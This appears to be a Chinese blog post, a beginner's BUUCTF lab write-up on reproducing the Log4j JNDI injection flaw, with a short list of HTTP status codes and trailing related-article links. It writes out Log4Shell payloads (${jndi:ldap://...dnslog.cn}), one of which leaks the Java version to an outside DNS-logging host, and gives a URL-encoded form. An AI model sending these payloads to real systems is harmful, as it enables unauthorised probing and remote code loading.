buuctf漏洞复现之log4j

前言:

发现自己不会挖掘漏洞,遂学习常见漏洞复现

思考:

什么是log4j,是apache下的java应用常见的开源日志库,也就是java语言,中间件为apache

内容:

{jndi:ldap://{sys:java.version}.gf3q2v.dnslog.cn}

dnslog获取的域名

发现有传入参数,于是在网上找了可以传入dnslog的域名

{jndi:ldap://{sys:java.version}.gf3q2v.dnslog.cn

但是400错误了,于是在网上找了400错误是什么。那就是服务器处理不了的请求,

参考解析HTTP错误码400 Bad Request及其常见原因与解决方法-CSDN博客

复制代码
1xx:信息,表示服务器已接收到请求并且正在处理。
2xx:成功,表示服务器成功处理了请求。
3xx:重定向,表示需要进一步操作以完成请求。
4xx:客户端错误,表示服务器无法处理请求。
5xx:服务器错误,表示服务器在处理请求时发生了错误。

我在网上好像看到答案了,说是400错误是由于,客户端传输过程中进行解码了

我的猜想是对的,但是不是用那个payload解的,

发现那个payload也可以,我看网上多写了空格!!!也是需要url编码的

推荐网站CTF在线工具-CTF工具|CTF编码|CTF密码学|CTF加解密|程序员工具|在线编解码

{jndi:ldap://{sys:java.version}.gf3q2v.dnslog.cn}

是用这个${jndi:ldap://xyr4kk.dnslog.cn}

但是要编码,编码之后为

复制代码
%24%7Bjndi%3Aldap%3A//xyr4kk.dnslog.cn%7D
相关推荐
爱的叹息15 小时前
Log4j Properties 配置项详细说明
junit·单元测试·log4j
ACGkaka_3 天前
Spring Boot实战(三十六)编写单元测试
spring boot·单元测试·log4j
forestsea14 天前
分布式日志治理:Log4j2自定义Appender写日志到RocketMQ
java·log4j·java-rocketmq
遥不可及~~斌17 天前
Spring Boot 项目日志系统全攻略:Logback、Log4j2、Log4j与SLF4J整合指南
spring boot·log4j·logback
weixin_4383354017 天前
SpringBoot依赖冲突引发的 log4j 日志打印问题及解决方法
spring boot·单元测试·log4j
我是坑货18 天前
maven的项目管理和构建生命周期
java·log4j·maven
凭君语未可1 个月前
详解Maven的主要生命周期
java·log4j·maven
WIN赢1 个月前
单元测试的编写
单元测试·log4j
zerohawk1 个月前
【log4j】配置Slf4j
junit·单元测试·log4j
熬了夜的程序员1 个月前
Go 语言封装邮件发送功能
开发语言·后端·golang·log4j